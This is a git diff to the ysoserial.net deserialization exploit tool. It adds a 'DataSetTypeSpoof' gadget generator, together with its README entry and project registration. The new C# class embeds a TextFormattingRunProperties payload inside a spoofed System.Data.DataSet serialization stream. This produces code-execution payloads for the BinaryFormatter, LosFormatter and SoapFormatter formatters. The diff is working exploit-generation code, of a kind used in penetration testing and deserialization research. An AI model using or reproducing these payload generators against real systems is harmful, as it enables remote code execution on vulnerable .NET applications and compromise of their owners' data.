diff --git a/README.md b/README.md
index 9683591..bc0533b 100644
--- a/README.md
+++ b/README.md
@@ -46,6 +46,8 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
 		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 	(*) DataSet
 		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
+	(*) DataSetTypeSpoof
+		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 	(*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
 		Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
 	(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
diff --git a/ysoserial/Generators/DataSetTypeSpoofGenerator.cs b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
new file mode 100644
index 0000000..7c16631
--- /dev/null
+++ b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Data;
+using System.IO;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+    public class DataSetTypeSpoofGenerator : DataSetGenerator
+    {
+        public override string Name()
+        {
+            return "DataSetTypeSpoof";
+        }
+
+        public override string Contributors()
+        {
+            return "Soroush Dalili, Markus Wulftange, Jang";
+        }
+
+        public override object Generate(string formatter, InputArgs inputArgs)
+        {
+            byte[] init_payload =
+                (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
+            DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
+            if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
+                || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
+                || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
+            {
+                return Serialize(payloadDataSetMarshal, formatter, inputArgs);
+            }
+            else
+            {
+                throw new Exception("Formatter not supported");
+            }
+        }
+    }
+
+    // https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
+    [Serializable]
+    public class DataSetSpoofMarshal : ISerializable
+    {
+        byte[] _fakeTable;
+
+        public void GetObjectData(SerializationInfo info, StreamingContext context)
+        {
+            // info.SetType(typeof(System.Data.DataSet));
+            info.AssemblyName = "mscorlib";
+            info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
+            info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
+            info.AddValue("DataSet.DataSetName", "");
+            info.AddValue("DataSet.Namespace", "");
+            info.AddValue("DataSet.Prefix", "");
+            info.AddValue("DataSet.CaseSensitive", false);
+            info.AddValue("DataSet.LocaleLCID", 0x409);
+            info.AddValue("DataSet.EnforceConstraints", false);
+            info.AddValue("DataSet.ExtendedProperties", (System.Data.PropertyCollection) null);
+            info.AddValue("DataSet.Tables.Count", 1);
+            info.AddValue("DataSet.Tables_0", _fakeTable);
+        }
+
+        public void SetFakeTable(byte[] bfPayload)
+        {
+            _fakeTable = bfPayload;
+        }
+
+        public DataSetSpoofMarshal(byte[] bfPayload)
+        {
+            SetFakeTable(bfPayload);
+        }
+
+        public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
+        {
+            // This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
+        }
+
+        public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
+        {
+            MemoryStream stm = new MemoryStream();
+            if (inputArgs.Minify)
+            {
+                ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
+                    new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
+                fmtLocal.Serialize(stm, fakeTable);
+            }
+            else
+            {
+                BinaryFormatter fmt = new BinaryFormatter();
+                fmt.Serialize(stm, fakeTable);
+            }
+
+            SetFakeTable(stm.ToArray());
+        }
+
+        public DataSetSpoofMarshal(MemoryStream ms)
+        {
+            SetFakeTable(ms.ToArray());
+        }
+    }
+}
\ No newline at end of file
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index 628729e..f792221 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -158,6 +158,7 @@
     <Compile Include="Generators\AxHostStateGenerator.cs" />
     <Compile Include="Generators\ClaimsPrincipalGenerator.cs" />
     <Compile Include="Generators\DataSetGenerator.cs" />
+    <Compile Include="Generators\DataSetTypeSpoofGenerator.cs" />
     <Compile Include="Generators\ObjRefGenerator.cs" />
     <Compile Include="Generators\ResourceSetGenerator.cs" />
     <Compile Include="Generators\SessionSecurityTokenGenerator.cs" />